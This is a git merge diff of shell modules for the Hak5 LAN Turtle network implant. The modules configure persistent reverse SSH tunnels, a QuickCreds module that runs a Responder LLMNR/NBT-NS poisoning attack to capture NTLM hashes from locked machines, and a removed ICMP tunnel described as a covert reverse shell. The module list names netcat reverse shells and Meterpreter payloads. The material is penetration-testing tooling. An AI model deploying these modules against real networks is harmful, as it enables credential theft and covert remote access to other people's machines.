Merge branch 'gh-pages' into patch-1
commit
d6c5b4e346
|
@ -1,6 +1,6 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
|
||||
VERSION="1.2"
|
||||
VERSION="1.3"
|
||||
DESCRIPTION="AutoSSH maintains persistent secure shells"
|
||||
CONF=/tmp/autossh.form
|
||||
|
||||
|
@ -26,14 +26,14 @@ function stop {
|
|||
}
|
||||
|
||||
function status {
|
||||
if pgrep autossh > /dev/null; then echo "1"; else echo "0"; fi
|
||||
if pgrep /usr/sbin/autossh > /dev/null; then echo "1"; else echo "0"; fi
|
||||
}
|
||||
|
||||
function configure {
|
||||
if [ -s /etc/config/autossh ]
|
||||
then
|
||||
autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}')
|
||||
autossh_port=$(uci show autossh.@autossh[0].ssh | awk '{print $9}')
|
||||
autossh_host=$(uci show autossh.@autossh[0].ssh | awk '{print $7}' | sed "s/'//g")
|
||||
autossh_port=$(uci show autossh.@autossh[0].ssh | awk '{print $9}' | sed "s/'//g")
|
||||
autossh_remoteport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $1}')
|
||||
autossh_localport=$(uci show autossh.@autossh[0].ssh | awk '{print $6}' | sed 's/:/ /g' | awk '{print $3}')
|
||||
else
|
||||
|
@ -65,6 +65,7 @@ Local Port: Local port to bind tunnel (Default 22)\n \n" 16 60 4\
|
|||
read -r autossh_localport
|
||||
touch /etc/config/autossh
|
||||
uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -N -T -R "$autossh_remoteport":localhost:"$autossh_localport" "$autossh_host" -p "$autossh_port" "
|
||||
uci set autossh.@autossh[0].enabled="1"
|
||||
uci commit autossh
|
||||
rm $CONF
|
||||
};;
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
VERSION="1.1"
|
||||
VERSION="1.2"
|
||||
DESCRIPTION="SSH Key Manager"
|
||||
EXECUTABLE="0"
|
||||
CONF=/tmp/keymanager.form
|
||||
|
@ -11,8 +11,6 @@ CONF=/tmp/keymanager.form
|
|||
: ${DIALOG_ITEM_HELP=4}
|
||||
: ${DIALOG_ESC=255}
|
||||
|
||||
|
||||
|
||||
function generate_key {
|
||||
dialog --title "Generate New SSH Key Pair?" \
|
||||
--yesno "\nGenerate New SSH Key Pair?\n\n\
|
||||
|
@ -31,10 +29,6 @@ case $? in
|
|||
esac
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function copy_key {
|
||||
dialog --ok-label "Submit" \
|
||||
--title "SSH Copy ID" \
|
||||
|
@ -54,9 +48,6 @@ User: User on remote SSH server.\n \n" 17 60 3\
|
|||
read -r copy_host
|
||||
read -r copy_port
|
||||
read -r copy_user
|
||||
read -r copy_pass
|
||||
|
||||
|
||||
|
||||
if [ -z "$copy_host" ]; then
|
||||
dialog --title "Notice" --msgbox "Host Required" 5 60; copy_key
|
||||
|
@ -67,21 +58,6 @@ User: User on remote SSH server.\n \n" 17 60 3\
|
|||
if [ -z "$copy_user" ]; then
|
||||
dialog --title "Notice" --msgbox "User Required" 5 60; copy_key
|
||||
fi
|
||||
touch /root/.ssh/known_hosts
|
||||
if ! grep -q $copy_host /root/.ssh/known_hosts; then
|
||||
dialog --title "Notice" --msgbox "Cannot find $copy_host in known_hosts. Adding it now." 6 60
|
||||
ssh-keyscan -p "$copy_port" "$copy_host" 2>/dev/null > /tmp/tmp_hosts
|
||||
cat /tmp/tmp_hosts >> /root/.ssh/known_hosts
|
||||
NEWHOST=$(cat /tmp/tmp_hosts)
|
||||
if [[ -s /tmp/tmp_hosts ]]; then
|
||||
dialog --title "Notice" --msgbox "Added the following to /root/.ssh/known_hosts:\n\n$NEWHOST" 18 60
|
||||
else
|
||||
dialog --title "Notice" --msgbox "There was an error retrieving the key fingerprint" 8 60
|
||||
copy_key
|
||||
fi;
|
||||
rm /tmp/tmp_hosts
|
||||
fi
|
||||
|
||||
rm /tmp/empty_* &>/dev/null
|
||||
ssh-copy-id -i /root/.ssh/id_rsa.pub -p "$copy_port" "$copy_user"@"$copy_host"
|
||||
configure
|
||||
|
@ -91,44 +67,9 @@ User: User on remote SSH server.\n \n" 17 60 3\
|
|||
esac
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function add_host {
|
||||
dialog --ok-label "Submit" \
|
||||
--title "Add Remote Server to Known Hosts List" \
|
||||
--form "This utility will add the remote SSH servers key fingerprint to the local known hosts file.\n \n\
|
||||
Host: Remote SSH Server.\n\
|
||||
Port: Remote SSH Server Port (Typically 22).\n \n" 14 60 2\
|
||||
"Host:" 1 1 "$add_host" 1 7 48 0 \
|
||||
"Port:" 2 1 "$add_port" 2 7 48 0 \
|
||||
2>$CONF
|
||||
return=$?
|
||||
|
||||
case $return in
|
||||
0)
|
||||
cat $CONF | {
|
||||
read -r add_host
|
||||
read -r add_port
|
||||
if [ -z "$add_port" ]; then
|
||||
add_port="22"
|
||||
fi
|
||||
ssh-keyscan -p "$add_port" "$add_host" > /tmp/tmp_hosts
|
||||
cat /tmp/tmp_hosts >> /root/.ssh/known_hosts
|
||||
NEWHOST=`cat /tmp/tmp_hosts`
|
||||
if [[ -s /tmp/tmp_hosts ]]; then
|
||||
dialog --title "Notice" --msgbox "Added the following to /root/.ssh/known_hosts:\n\n$NEWHOST" 18 60
|
||||
else
|
||||
dialog --title "Notice" --msgbox "There was an error retrieving the key fingerprint" 8 60
|
||||
fi;
|
||||
rm /tmp/tmp_hosts
|
||||
dialog --title "Notice" --msgbox "This function is deprecated and is now served by copy_key. This notice exists for documentation consistency. Please run copy_key." 8 60
|
||||
configure
|
||||
};;
|
||||
1) configure;;
|
||||
255) configure;;
|
||||
esac
|
||||
}
|
||||
|
||||
function review {
|
||||
|
@ -155,5 +96,3 @@ function configure {
|
|||
"back") exit;;
|
||||
esac
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
VERSION="1.0"
|
||||
DESCRIPTION="Metasploit payload to maintain shells"
|
||||
DESCRIPTION="Deprecated - requires firmware v6.1 or below. Metasploit payload to maintain shells."
|
||||
CONF=/tmp/meterpreter.form
|
||||
|
||||
: ${DIALOG_OK=0}
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
# http://imcpwn.com
|
||||
|
||||
VERSION="2.1"
|
||||
DESCRIPTION="Stageless Metasploit payload to maintain shells"
|
||||
DESCRIPTION="Deprecated - requires firmware v6.1 or below. Stageless Metasploit payload to maintain shells"
|
||||
CONF=/tmp/meterpreter-sl.form
|
||||
AUTHOR=IMcPwn
|
||||
|
||||
|
|
|
@ -1,26 +1,24 @@
|
|||
autossh Maintain persistent secure shells
|
||||
clomac Clone Clients MAC address into WAN interface
|
||||
cron Schedule tasks
|
||||
ddnsc Dynamic Domain Name Service
|
||||
dns-spoof Forges replies to arbitrary DNS address
|
||||
dnsmasq-spoof DNSSpoof using DNSMasq
|
||||
follow-file Follow log printing data as file grows
|
||||
iodine Creates a DNS Tunnel using iodine
|
||||
keymanager SSH Key Manager
|
||||
meterpreter Metasploit payload to maintain shells
|
||||
meterpreter-https Metasploit HTTPS payload for more discrete shells
|
||||
modulemanager Manage Modules
|
||||
netcat-revshell NetCat Reverse Shell
|
||||
nmap-scan Network Mapper discovers hosts and services on a network
|
||||
openvpn Openvpn client
|
||||
ptunnel Proxies TCP over Ping (ICMP) traffic
|
||||
quickcreds Snag creds from locked machines -Mubix, Room362.com
|
||||
responder Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||
script2email Email script output via SMTP
|
||||
script2http Post script output via HTTP
|
||||
sshfs Mounts remote File Systems over SSH
|
||||
tortle TOR Turtle Gateway TOR hidden SHELL Service
|
||||
upnp-portfwd uPnP Port Forwarding
|
||||
uptime System Uptime
|
||||
urlsnarf Sniffs HTTP URL traffic
|
||||
clomac Clone Clients MAC address into WAN interface
|
||||
upnp-portfwd uPnP Port Forwarding
|
||||
ddnsc Dynamic Domain Name Service
|
||||
tortle TOR Turtle Gateway TOR hidden SHELL Service
|
||||
meterpreter-sl Stageless Metasploit payload to maintain shells
|
||||
responder Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||
QuickCreds Snag creds from locked machines -Mubix, Room362.com
|
||||
iodine Creates a DNS Tunnel using iodine
|
||||
meterpreter-https Metasploit HTTPS payload for more discrete shells
|
||||
|
|
|
@ -26,7 +26,7 @@ function stop {
|
|||
}
|
||||
|
||||
function status {
|
||||
if pgrep openvpn > /dev/null; then echo "1"; else echo "0"; fi
|
||||
if pgrep /usr/sbin/openvpn > /dev/null; then echo "1"; else echo "0"; fi
|
||||
}
|
||||
|
||||
function configure {
|
||||
|
|
|
@ -0,0 +1,203 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
|
||||
VERSION="1.0"
|
||||
DESCRIPTION="Sends ping response data to a SSHFS host"
|
||||
CONF=/tmp/ping-monitor.form
|
||||
|
||||
: ${DIALOG_OK=0}
|
||||
: ${DIALOG_CANCEL=1}
|
||||
: ${DIALOG_HELP=2}
|
||||
: ${DIALOG_EXTRA=3}
|
||||
: ${DIALOG_ITEM_HELP=4}
|
||||
: ${DIALOG_ESC=255}
|
||||
|
||||
sp="/root/ping_monitor.output"
|
||||
pf="/var/run/ping-monitor.pid"
|
||||
|
||||
function set_globals {
|
||||
if [ -s /etc/config/ping-monitor ]
|
||||
then
|
||||
target=$(uci get ping-monitor.target)
|
||||
else
|
||||
touch /etc/config/ping-monitor
|
||||
echo "ping-monitor not configured"
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
function check_sshfs {
|
||||
cat /etc/mtab | awk '{print $2}' | grep -e '^/sshfs'
|
||||
return $?
|
||||
}
|
||||
|
||||
function stop_ping {
|
||||
pingpid=$(ps | grep -v grep | grep 'ping '"${target}" | awk '{print $1}')
|
||||
kill -2 ${pingpid}
|
||||
while kill -0 ${pingpid} > /dev/null 2>&1; do sleep 0.1; done
|
||||
}
|
||||
|
||||
function start_ping {
|
||||
case "$(status)" in
|
||||
1)
|
||||
# Already running
|
||||
return 1
|
||||
;;
|
||||
*)
|
||||
:
|
||||
;;
|
||||
esac
|
||||
|
||||
check_sshfs > /dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
find /root -type f -name "ping_monitor.*" -exec mv {} /sshfs \;
|
||||
fi
|
||||
|
||||
ping ${target} | while read pong; do echo "$(date '+%Y-%m-%d %H:%M:%S') ${pong}"; done > ${sp} &
|
||||
local pid=$!
|
||||
echo ${pid} > ${pf}
|
||||
|
||||
echo "ping-monitor started with pid: ${pid}"
|
||||
|
||||
return 0
|
||||
}
|
||||
|
||||
function move {
|
||||
local dt="$(date +%Y%m%d-%H%M%S)"
|
||||
local dp="/root/ping_monitor.${dt}"
|
||||
|
||||
if [ -f ${sp} ]; then
|
||||
mv ${sp} ${dp} # atomic?
|
||||
fi
|
||||
|
||||
check_sshfs > /dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
test -f ${dp} && mv ${dp} /sshfs
|
||||
fi
|
||||
|
||||
}
|
||||
|
||||
function rotate {
|
||||
stop_ping
|
||||
move
|
||||
start_ping
|
||||
}
|
||||
|
||||
function start {
|
||||
set_globals || exit 1
|
||||
start_ping
|
||||
case $? in
|
||||
2)
|
||||
exit 1
|
||||
;;
|
||||
1)
|
||||
# It's already running. Let's sigint and rotate.
|
||||
rotate
|
||||
;;
|
||||
*)
|
||||
:
|
||||
;;
|
||||
esac
|
||||
if [ -f /var/spool/cron/crontabs/root ]; then
|
||||
grep '\*/5 \* \* \* \* /etc/turtle/modules/ping-monitor start' /var/spool/cron/crontabs/root > /dev/null || {
|
||||
echo '*/5 * * * * /etc/turtle/modules/ping-monitor start' >> /var/spool/cron/crontabs/root
|
||||
/etc/init.d/cron reload
|
||||
}
|
||||
fi
|
||||
|
||||
check_sshfs > /dev/null 2>&1
|
||||
if [ $? -ne 0 ]; then
|
||||
>&2 echo "sshfs is not mounted"
|
||||
if [ "$(/etc/turtle/modules/sshfs status)" != "Running." ]; then
|
||||
/etc/turtle/modules/sshfs start
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
function stop {
|
||||
set_globals || exit 1
|
||||
|
||||
sed -i '/\*\/5 \* \* \* \* \/etc\/turtle\/modules\/ping-monitor start/d' /var/spool/cron/crontabs/root
|
||||
/etc/init.d/cron reload
|
||||
|
||||
stop_ping
|
||||
|
||||
# Attempt to move the last log
|
||||
move
|
||||
}
|
||||
|
||||
function status {
|
||||
if [ -f ${pf} ]; then
|
||||
pid="$(head -n1 ${pf})"
|
||||
|
||||
kill -0 ${pid} > /dev/null 2>&1
|
||||
if [ $? -eq 0 ]; then
|
||||
if [ "ping-monitor" == "$(cat /proc/${pid}/comm)" ]; then
|
||||
echo "1";
|
||||
return 0
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
echo "0"
|
||||
}
|
||||
|
||||
function configure {
|
||||
if [ ! -f /etc/turtle/modules/sshfs ]; then
|
||||
echo "dependency module sshfs is not installed."
|
||||
return 1
|
||||
fi
|
||||
check_sshfs > /dev/null 2>&1
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "sshfs is not mounted."
|
||||
return 1
|
||||
fi
|
||||
if [ -s /etc/config/ping-monitor ]
|
||||
then
|
||||
target=$(uci get ping-monitor.target)
|
||||
else
|
||||
touch /etc/config/ping-monitor
|
||||
fi
|
||||
|
||||
dialog --ok-label "Submit" \
|
||||
--help-button \
|
||||
--title "ping-monitor configuration" \
|
||||
--form "Send ping data to a remote host (requires sshfs module)\n\n\
|
||||
Target: host to ping.\n" 16 60 1\
|
||||
"Target:" 1 1 "${target}" 1 9 54 0 \
|
||||
2>$CONF
|
||||
|
||||
return=$?
|
||||
|
||||
case $return in
|
||||
$DIALOG_OK)
|
||||
cat $CONF | {
|
||||
read -r target
|
||||
|
||||
if [ -z "$target" ]; then
|
||||
target="8.8.8.8"
|
||||
fi
|
||||
touch /etc/config/ping-monitor
|
||||
uci set ping-monitor.target="$target"
|
||||
uci commit ping-monitor
|
||||
rm $CONF
|
||||
clear
|
||||
};;
|
||||
$DIALOG_CANCEL)
|
||||
rm $CONF
|
||||
clear
|
||||
exit;;
|
||||
$DIALOG_HELP)
|
||||
dialog --title "Help" \
|
||||
--msgbox " \
|
||||
ping-monitor will send continuous ping requests to a target host and record the timestamped \
|
||||
responses to the local filesystem. Every 5 minutes, it will attempt to move the response data \
|
||||
from the local filesystem to a remote filesystem over sshfs. Therefore, this module requires \
|
||||
that the sshfs module be installed, configured, and started. \n\n \
|
||||
For analyzing the data, use any of your favorite tools like sed, awk, find, and python. \n\n \
|
||||
For some out-of-the-box examples, look at https://github.com/mmdj4u/lanturtle-heaven \
|
||||
" 20 60
|
||||
configure
|
||||
;;
|
||||
$DIALOG_ESC)
|
||||
clear;;
|
||||
esac
|
||||
}
|
103
modules/ptunnel
103
modules/ptunnel
|
@ -1,103 +0,0 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
VERSION="1.0"
|
||||
DESCRIPTION="Proxies TCP over Ping (ICMP) traffic"
|
||||
CONF=/tmp/ptunnel.form
|
||||
|
||||
: ${DIALOG_OK=0}
|
||||
: ${DIALOG_CANCEL=1}
|
||||
: ${DIALOG_HELP=2}
|
||||
: ${DIALOG_EXTRA=3}
|
||||
: ${DIALOG_ITEM_HELP=4}
|
||||
: ${DIALOG_ESC=255}
|
||||
|
||||
function start {
|
||||
if [ -s /etc/config/ptunnel ]
|
||||
then
|
||||
ptunnel_host=$(uci get ptunnel.host)
|
||||
ptunnel_local_port=$(uci get ptunnel.lport)
|
||||
ptunnel_dst_host=$(uci get ptunnel.rhost)
|
||||
ptunnel_dst_port=$(uci get ptunnel.rport)
|
||||
echo ptunnel -p "$ptunnel_host" -lp "$ptunnel_local_port" -da "$ptunnel_dst_host" -dp "$ptunnel_dst_port" > /dev/null &
|
||||
ptunnel -p "$ptunnel_host" -lp "$ptunnel_local_port" -da "$ptunnel_dst_host" -dp "$ptunnel_dst_port" > /dev/null &
|
||||
echo -n "ptunnel started with pid: "; pidof ptunnel
|
||||
else
|
||||
touch /etc/config/ptunnel
|
||||
echo "ptunnel not configured"
|
||||
fi
|
||||
}
|
||||
|
||||
function stop {
|
||||
killall ptunnel
|
||||
}
|
||||
|
||||
function status {
|
||||
if pgrep ptunnel > /dev/null; then echo "1"; else echo "0"; fi
|
||||
}
|
||||
|
||||
function configure {
|
||||
|
||||
if [ -s /etc/config/ptunnel ]
|
||||
then
|
||||
ptunnel_host=$(uci get ptunnel.host)
|
||||
ptunnel_local_port=$(uci get ptunnel.lport)
|
||||
ptunnel_dst_host=$(uci get ptunnel.rhost)
|
||||
ptunnel_dst_port=$(uci get ptunnel.rport)
|
||||
else
|
||||
touch /etc/config/ptunnel
|
||||
fi
|
||||
|
||||
dialog --ok-label "Submit" \
|
||||
--help-button \
|
||||
--title "PTunnel Configuration" \
|
||||
--form "\nPTunnel Server: Address of the server running the ptunnel proxy.\n\
|
||||
Local Port: Port on localhost from which traffic will be tunneled.\n\
|
||||
Dst Server: Destination host to which traffic will be proxied.\n\
|
||||
Dst Port: Destination port to which traffic will be proxied.\n\n" 16 75 4\
|
||||
"PTunnel Host:" 1 1 "$ptunnel_host" 1 15 40 0 \
|
||||
"Local Port:" 2 1 "$ptunnel_local_port" 2 15 40 0 \
|
||||
"Dst. Host:" 3 1 "$ptunnel_dst_host" 3 15 40 0 \
|
||||
"Dst. Port:" 4 1 "$ptunnel_dst_port" 4 15 40 0 \
|
||||
2>$CONF
|
||||
|
||||
return=$?
|
||||
|
||||
case $return in
|
||||
$DIALOG_OK)
|
||||
cat $CONF | {
|
||||
read -r ptunnel_host
|
||||
read -r ptunnel_local_port
|
||||
read -r ptunnel_dst_host
|
||||
read -r ptunnel_dst_port
|
||||
touch /etc/config/ptunnel
|
||||
uci set ptunnel.host="$ptunnel_host"
|
||||
uci set ptunnel.lport="$ptunnel_local_port"
|
||||
uci set ptunnel.rhost="$ptunnel_dst_host"
|
||||
uci set ptunnel.rport="$ptunnel_dst_port"
|
||||
uci commit ptunnel
|
||||
rm $CONF
|
||||
clear
|
||||
};;
|
||||
$DIALOG_CANCEL)
|
||||
rm $CONF
|
||||
clear
|
||||
exit;;
|
||||
$DIALOG_HELP)
|
||||
dialog --title "Help" \
|
||||
--msgbox "Ping Tunnel, or ptunnel, is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies.\
|
||||
A common use case is to provide a secure covert reverse shell via SSH.\n\n\
|
||||
Ping Tunnel configuration accepts the following:\n\n\
|
||||
* Ptunnel Host: Address of the server running the ptunnel proxy - often a VPS or other such machine online with a static IP or domain.\n\
|
||||
* Local Port: TCP listening port on localhost through which traffic will be proxied to the ptunnel host.\n\
|
||||
* Dst Server: Destination host of the remote proxy to which traffic will be forwarded.\n\
|
||||
* Dst Port: Destination port to remote proxy to which traffic will be forwarded.\n\n\
|
||||
Example: example.com, 8000, example.com, 22\n\n\
|
||||
This would configure ptunnel to connect to the ptunnel server running on domain.com and forward all traffic going to port 8000 on localhost to port 22 on example.com.\n\n\
|
||||
With this an autoSSH session to the SSH server running on example.com port 22 may be established through the Ping Tunnel via localhost port 8000.\
|
||||
" 20 60
|
||||
configure
|
||||
;;
|
||||
$DIALOG_ESC)
|
||||
clear;;
|
||||
esac
|
||||
}
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
VERSION="1.3"
|
||||
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink rapidly while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
|
||||
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
|
||||
CONF=/tmp/QuickCreds.form
|
||||
|
||||
: ${DIALOG_OK=0}
|
||||
|
@ -10,11 +10,6 @@ CONF=/tmp/QuickCreds.form
|
|||
: ${DIALOG_ITEM_HELP=4}
|
||||
: ${DIALOG_ESC=255}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function configure {
|
||||
# dialog --title "QuickCreds" --msgbox "\n\
|
||||
# Dependencies will be installed. An Internet connection is required.\n\
|
||||
|
@ -30,7 +25,6 @@ case $response in
|
|||
255) exit ;;
|
||||
esac
|
||||
|
||||
|
||||
# Check to see if QuickCreds has already been configured
|
||||
if [[ -d /root/loot || -s /root/loot/responder.log ]];
|
||||
then
|
||||
|
@ -51,11 +45,6 @@ The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Inter
|
|||
# Install dependencies
|
||||
opkg update | dialog --progressbox "Updating opkg" 14 72
|
||||
|
||||
if [[ ! $(opkg list-installed | grep git) ]];
|
||||
then
|
||||
opkg install git | dialog --progressbox "Installing dependency git" 14 72
|
||||
fi
|
||||
|
||||
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
|
||||
then
|
||||
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
|
||||
|
@ -79,8 +68,11 @@ fi
|
|||
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
|
||||
then
|
||||
rm -rf /etc/turtle/Responder
|
||||
git clone git://github.com/lgandx/responder /etc/turtle/Responder -q | dialog --progressbox "Installing dependency responder" 14 72
|
||||
rm -rf /etc/turtle/Responder/.git
|
||||
rm -rf /tmp/v2.3.3.5.tar.gz*
|
||||
wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72
|
||||
mkdir /etc/turtle/Responder
|
||||
tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72
|
||||
rm -rf /tmp/v2.3.3.5.tar.gz*
|
||||
fi
|
||||
|
||||
# Setup loot directory and complete setup
|
||||
|
@ -92,11 +84,6 @@ Configuration complete. Creds will be saved to /root/loot\n\
|
|||
Enable this module to have it start the attack on boot.\n" 9 72
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function start {
|
||||
# Stop on-off-on DHCP blink pattern script
|
||||
echo "Stopping DHCP Detect Blink Script"
|
||||
|
@ -138,32 +125,24 @@ if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
|
|||
finished
|
||||
fi
|
||||
fi
|
||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
|
||||
/usr/bin/sleep 0.04
|
||||
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness
|
||||
/usr/bin/sleep 0.04
|
||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
||||
sleep 1
|
||||
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
|
||||
|
||||
function finished {
|
||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness
|
||||
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
|
||||
exit
|
||||
}
|
||||
|
||||
|
||||
function stop {
|
||||
kill $(ps | grep [R]esponder | awk {'print $1'})
|
||||
/etc/init.d/dnsmasq start 1&> /dev/null
|
||||
echo "QuickCreds Stopped"
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
function status {
|
||||
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
|
||||
}
|
|
@ -32,7 +32,7 @@ function stop {
|
|||
}
|
||||
|
||||
function status {
|
||||
if pgrep sshfs > /dev/null; then echo "1"; else echo "0"; fi
|
||||
if pgrep /usr/bin/sshfs > /dev/null; then echo "1"; else echo "0"; fi
|
||||
}
|
||||
|
||||
function configure {
|
||||
|
|
120
modules/urlsnarf
120
modules/urlsnarf
|
@ -1,120 +0,0 @@
|
|||
#!/bin/bash /usr/lib/turtle/turtle_module
|
||||
VERSION="1.1"
|
||||
DESCRIPTION="URL Snarf sniffs HTTP traffic"
|
||||
CONF=/tmp/urlsnarf.form
|
||||
|
||||
: ${DIALOG_OK=0}
|
||||
: ${DIALOG_CANCEL=1}
|
||||
: ${DIALOG_HELP=2}
|
||||
: ${DIALOG_EXTRA=3}
|
||||
: ${DIALOG_ITEM_HELP=4}
|
||||
: ${DIALOG_ESC=255}
|
||||
|
||||
function start {
|
||||
DATE=$(date +"%Y-%m-%d_%H-%M")
|
||||
if [ -s /etc/config/urlsnarf ]
|
||||
then
|
||||
urlsnarf_log=$(uci get urlsnarf.log)
|
||||
case $urlsnarf_log in
|
||||
sshfs)
|
||||
if pgrep sshfs > /dev/null; then
|
||||
echo "SSHFS Running"
|
||||
echo "urlsnarf -n -i br-lan >> /sshfs/urlsnarf_$DATE.log" | at now
|
||||
echo urlsnarf started with pid $(pidof urlsnarf)
|
||||
else
|
||||
echo "SSHFS not running"
|
||||
fi
|
||||
;;
|
||||
tmp)
|
||||
echo "urlsnarf -n -i br-lan > /tmp/urlsnarf_$DATE.log" | at now
|
||||
echo urlsnarf started with pid $(pidof urlsnarf)
|
||||
;;
|
||||
none)
|
||||
echo "urlsnarf -n -i br-lan" | at now
|
||||
echo urlsnarf started with pid $(pidof urlsnarf)
|
||||
;;
|
||||
esac
|
||||
else
|
||||
echo "URLSnarf not configured."
|
||||
fi
|
||||
}
|
||||
|
||||
function stop {
|
||||
echo "Killing URLSnarf at PID:"
|
||||
pidof urlsnarf
|
||||
kill $(pidof urlsnarf)
|
||||
}
|
||||
|
||||
function status {
|
||||
if pgrep urlsnarf > /dev/null; then echo "1"; else echo "0"; fi
|
||||
}
|
||||
|
||||
function configure {
|
||||
if [ -s /etc/config/urlsnarf ];
|
||||
then
|
||||
urlsnarf_log=$(uci get urlsnarf.log)
|
||||
else
|
||||
touch /etc/config/urlsnarf
|
||||
fi
|
||||
|
||||
dialog --ok-label "Submit" \
|
||||
--extra-button \
|
||||
--extra-label "Test" \
|
||||
--help-button \
|
||||
--title "URLSnarf Configuration" \
|
||||
--radiolist "\n\
|
||||
urlsnarf outputs all requested URLs sniffed from HTTP traffic in CLF (Common Log Format, used by most web servers), suitable for offline post-processing with web log analysis tool (analog, wwwstat, etc.)...\n\nUse [Space] to select choice.\n" 16 60 3\
|
||||
1 "Save log to SSHFS if available." off\
|
||||
2 "Save log to /tmp/" off\
|
||||
3 "Do not save log file." on\
|
||||
2>$CONF
|
||||
|
||||
return=$?
|
||||
|
||||
case $return in
|
||||
$DIALOG_OK)
|
||||
LOG=$(cat $CONF)
|
||||
case $LOG in
|
||||
1)
|
||||
uci set urlsnarf.log="sshfs"
|
||||
uci commit urlsnarf
|
||||
;;
|
||||
2)
|
||||
uci set urlsnarf.log="tmp"
|
||||
uci commit urlsnarf
|
||||
;;
|
||||
3)
|
||||
uci set urlsnarf.log="none"
|
||||
uci commit urlsnarf
|
||||
;;
|
||||
esac
|
||||
;;
|
||||
$DIALOG_CANCEL)
|
||||
rm $CONF
|
||||
clear
|
||||
exit;;
|
||||
$DIALOG_HELP)
|
||||
dialog --title "Help" \
|
||||
--msgbox "\
|
||||
Using URLSnarf, one may monitor the HTTP (web) activity on passing through the LAN Turtle.\n\n\
|
||||
The default configuration monitors TCP ports 80, 8080 and 3128 (Squid) with IP hostname resolution disabled.\n\n\
|
||||
Activity may be logged either locally in /tmp/ (which is memory limited), or to a remote file system using the SSHFS module.\n\n\
|
||||
Logs will be saved in the CLF (Common Log Format) used by most web servers for further analysis with tools such as analog or wwwstat.\n\n\
|
||||
Log filenames are datestamped.\
|
||||
" 20 60
|
||||
configure
|
||||
;;
|
||||
$DIALOG_EXTRA)
|
||||
urlsnarf -n -i br-lan > /tmp/urlsnarf.log &
|
||||
dialog \
|
||||
--title "URL Snarf (keys 'h' and 'l' scroll)" \
|
||||
--tailbox /tmp/urlsnarf.log 18 72\
|
||||
2>$CONF
|
||||
kill $(pidof urlsnarf)
|
||||
rm /tmp/urlsnarf.log
|
||||
configure
|
||||
;;
|
||||
$DIALOG_ESC)
|
||||
clear;;
|
||||
esac
|
||||
}
|
|
@ -0,0 +1,22 @@
|
|||
function sha256sum() {
|
||||
python -sBc "import hashlib;print hashlib.sha256(open('$1','rb').read()).hexdigest()"
|
||||
}
|
||||
|
||||
echo -e "Update Available. Install will begin in 15 seconds...\n\n"
|
||||
echo -e "All local LAN Turtle data will be erased.\n\n"
|
||||
echo -e "Press CTRL+C to CANCEL\n\n"
|
||||
sleep 15
|
||||
echo -e "Downloading Upgrade file, please wait.\n\n"
|
||||
wget -q -O /tmp/upgrade.bin https://downloads.hak5.org/api/devices/lanturtle/firmwares/6.1
|
||||
echo -e "Upgrade file downloaded. Verifying file integrity.\n\n"
|
||||
[[ "$(sha256sum /tmp/upgrade.bin)" == "e8af71827f0c98fc1e62b531e2f0e4dbad12c1e45738affd6aaeedc92142af76" ]] && {
|
||||
echo -e "DO NOT UNPLUG OR POWER DOWN THE LAN TURTLE\n\n"
|
||||
echo -e "Upgrade in progress. Please wait ~5 minutes.\n"
|
||||
echo -e "The LAN Turtle will reboot when the upgrade is complete.\n"
|
||||
echo -e "This SSH session will now close.\n"
|
||||
